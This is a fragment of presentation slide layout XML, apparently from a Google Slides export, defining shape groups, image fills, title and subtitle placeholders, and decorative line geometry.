            <a:ext cx="2396400" cy="31581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454" name="Shape 454"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="455" name="Google Shape;455;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="0" y="2428625"/>
            <a:ext cx="9144002" cy="2714875"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144002" cy="2714875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="456" name="Google Shape;456;p19"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="7899750" y="101051"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="457" name="Google Shape;457;p19"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="-75050" y="75050"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Google Shape;458;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859050" y="1469100"/>
            <a:ext cx="2109600" cy="1076700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b"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459" name="Google Shape;459;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859050" y="2545800"/>
            <a:ext cx="2732700" cy="11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60" name="Google Shape;460;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="461" name="Google Shape;461;p19"/>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462" name="Google Shape;462;p19"/>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463" name="Google Shape;463;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="464" name="Google Shape;464;p19"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="465" name="Google Shape;465;p19"/>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9"/>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9"/>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9"/>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9" name="Google Shape;469;p19"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="470" name="Google Shape;470;p19"/>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9"/>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9"/>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9"/>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74" name="Google Shape;474;p19"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5597075" y="848775"/>
            <a:ext cx="1540800" cy="3219300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="475" name="Google Shape;475;p19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="148226" y="-1686"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="476" name="Google Shape;476;p19"/>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9"/>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9"/>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9"/>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9"/>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481" name="Shape 481"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="482" name="Google Shape;482;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="0" y="2428625"/>
            <a:ext cx="9144002" cy="2714875"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9144002" cy="2714875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="483" name="Google Shape;483;p20"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="7899750" y="101051"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="484" name="Google Shape;484;p20"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="-75050" y="75050"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Google Shape;485;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1234454"/>
            <a:ext cx="7704000" cy="113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486" name="Google Shape;486;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="487" name="Google Shape;487;p20"/>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488" name="Google Shape;488;p20"/>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489" name="Google Shape;489;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="490" name="Google Shape;490;p20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="491" name="Google Shape;491;p20"/>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0"/>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0"/>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0"/>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5" name="Google Shape;495;p20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="496" name="Google Shape;496;p20"/>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0"/>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0"/>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0"/>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00" name="Google Shape;500;p2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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="Google Shape;42;p3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="-12125"/>
            <a:ext cx="9144000" cy="5167749"/>
            <a:chOff x="0" y="-12125"/>
            <a:chExt cx="9144000" cy="5167749"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="Google Shape;43;p3"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="7899748" y="4028025"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="Google Shape;44;p3"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="0" y="-12125"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Google Shape;45;p3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="579525" y="261300"/>
            <a:ext cx="7980950" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Google Shape;46;p3"/>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47" name="Google Shape;47;p3"/>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48" name="Google Shape;48;p3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="458867"/>
            <a:ext cx="6289465" cy="4145142"/>
            <a:chOff x="1727190" y="458868"/>
            <a:chExt cx="6289465" cy="4145142"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="49" name="Google Shape;49;p3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4442730"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Google Shape;50;p3"/>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3"/>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3"/>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 name="Google Shape;54;p3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="458868"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Google Shape;55;p3"/>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3"/>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9" name="Google Shape;59;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024800" y="2051275"/>
            <a:ext cx="4465200" cy="141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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024800" y="1044475"/>
            <a:ext cx="900900" cy="841800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21DFD8">
              <a:alpha val="2152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atin typeface="Albert Sans Light"/>
                <a:ea typeface="Albert Sans Light"/>
                <a:cs typeface="Albert Sans Light"/>
                <a:sym typeface="Albert Sans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1" name="Google Shape;61;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024800" y="3516250"/>
            <a:ext cx="44652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2" name="Google Shape;62;p3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8730053" y="6"/>
            <a:ext cx="261257" cy="5143447"/>
            <a:chOff x="221120" y="-9"/>
            <a:chExt cx="454360" cy="3595559"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Google Shape;63;p3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="667991" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490"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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="-9"/>
              <a:ext cx="7489" cy="1304377"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1304377" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1304378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="130437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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="1467312"/>
              <a:ext cx="7489" cy="762341"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="762341" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="762342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76234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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="2411718"/>
              <a:ext cx="7489" cy="1183001"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1183001" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1183002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118300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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504887" y="-9"/>
              <a:ext cx="7489" cy="1833943"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1833943" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1833943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="18339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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504887" y="2066710"/>
              <a:ext cx="7489" cy="1528840"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1528840" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1528840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15288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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="-9"/>
              <a:ext cx="7489" cy="1054974"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1054974" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1054975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="1266127"/>
              <a:ext cx="7489" cy="2328592"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2328592" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2328593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="232859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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="-9"/>
              <a:ext cx="7489" cy="2570513"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2570513" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2570514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25705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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="2829052"/>
              <a:ext cx="7489" cy="766498"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="766498" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="766499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="7664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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288525" y="-9"/>
              <a:ext cx="7489" cy="1514707"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1514707" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1514708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="151470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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288525" y="1874670"/>
              <a:ext cx="7489" cy="1720049"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1720049" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1720049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="17200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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="221120" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489"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01" name="Shape 501"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="502" name="Google Shape;502;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="503" name="Google Shape;503;p21"/>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504" name="Google Shape;504;p21"/>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505" name="Google Shape;505;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="180167"/>
            <a:ext cx="6289465" cy="4761342"/>
            <a:chOff x="1727190" y="180168"/>
            <a:chExt cx="6289465" cy="4761342"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="506" name="Google Shape;506;p21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="507" name="Google Shape;507;p21"/>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1"/>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21"/>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21"/>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1" name="Google Shape;511;p21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7044690" y="180168"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="512" name="Google Shape;512;p21"/>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21"/>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21"/>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1"/>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16" name="Google Shape;516;p2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517" name="Google Shape;517;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4949453" y="2596900"/>
            <a:ext cx="2694000" cy="11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8" name="Google Shape;518;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1500550" y="2596900"/>
            <a:ext cx="2694000" cy="11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9" name="Google Shape;519;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1500546" y="2130700"/>
            <a:ext cx="26940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0" name="Google Shape;520;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4949454" y="2130700"/>
            <a:ext cx="26940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21" name="Google Shape;521;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2578675"/>
            <a:ext cx="9144000" cy="2564774"/>
            <a:chOff x="0" y="2578675"/>
            <a:chExt cx="9144000" cy="2564774"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="522" name="Google Shape;522;p21"/>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523" name="Google Shape;523;p21"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6429125" y="2578675"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="524" name="Google Shape;524;p21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
